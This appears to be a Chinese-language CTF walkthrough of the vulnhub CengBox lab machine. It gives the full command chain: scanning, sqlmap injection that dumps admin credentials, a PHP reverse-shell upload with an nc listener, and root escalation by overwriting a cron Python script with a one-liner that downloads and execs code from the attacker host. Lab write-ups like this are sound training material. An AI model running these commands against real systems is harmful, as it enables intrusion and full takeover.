vulnhub之CengBox的實踐

今天實踐的是vulnhub的CengBox鏡像，

下載地址，https://download.vulnhub.com/cengbox/CengBox.ova，

無法用workstation導入，用virtualbox導入成功，

做地址掃描，sudo netdiscover -r 192.168.0.0/24，

獲取到靶機地址192.168.0.185，

繼續進行端口掃描，sudo nmap -sS -sV -T5 -A -p- 192.168.0.185，

有web服務，進行目錄暴破解，

dirb http://192.168.0.185 /usr/share/dirb/wordlists/big.txt，

繼續掃描http://192.168.0.185/masteradmin目錄下的php路徑，

dirb http://192.168.0.185/masteradmin -X .php，

獲取到http://192.168.0.185/masteradmin/login.php和

http://192.168.0.185/masteradmin/upload.php，

對http://192.168.0.185/masteradmin/login.php進行sql注入暴破，

sqlmap -u 'http://192.168.0.185/masteradmin/login.php' --forms --dbs --batch，

繼續對cengbox數據庫進行sql注入暴破，

sqlmap -u 'http://192.168.0.185/masteradmin/login.php' --forms -D cengbox --dump-all --batch，

獲取到用戶名密碼，masteradmin/C3ng0v3R00T1!，

登錄http://192.168.0.185/masteradmin/upload.php，

kali攻擊機上準備反彈shell腳本，

cp /usr/share/webshells/php/php-reverse-shell.php php-reverse-shell.ceng，

上傳后，kali攻擊機上用nc開個反彈shell監聽，nc -lvp 4444，

瀏覽器訪問http://192.168.0.185/uploads/php-reverse-shell.ceng，

獲取到反彈shell，查看到cengover用戶，用之前獲取的密碼切過去，

再下載pspy64查找root權限的程序，

發現定時執行的md5check.py，

確認md5check.py是可寫的，

kali攻擊機上用msf做個反彈shell腳本并開啟監聽，

msfconsole

use exploit/multi/script/web_delivery

set LHOST 192.168.0.190

set LPORT 5555

exploit

把生成的反彈shell腳本寫入md5check.py，

echo "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.0.190:8080/XH7HFK0UJNqYZ', context=ssl._create_unverified_context());exec(r.read());" > md5check.py，

等一會兒反彈shell就過來了，進入session，確認是root，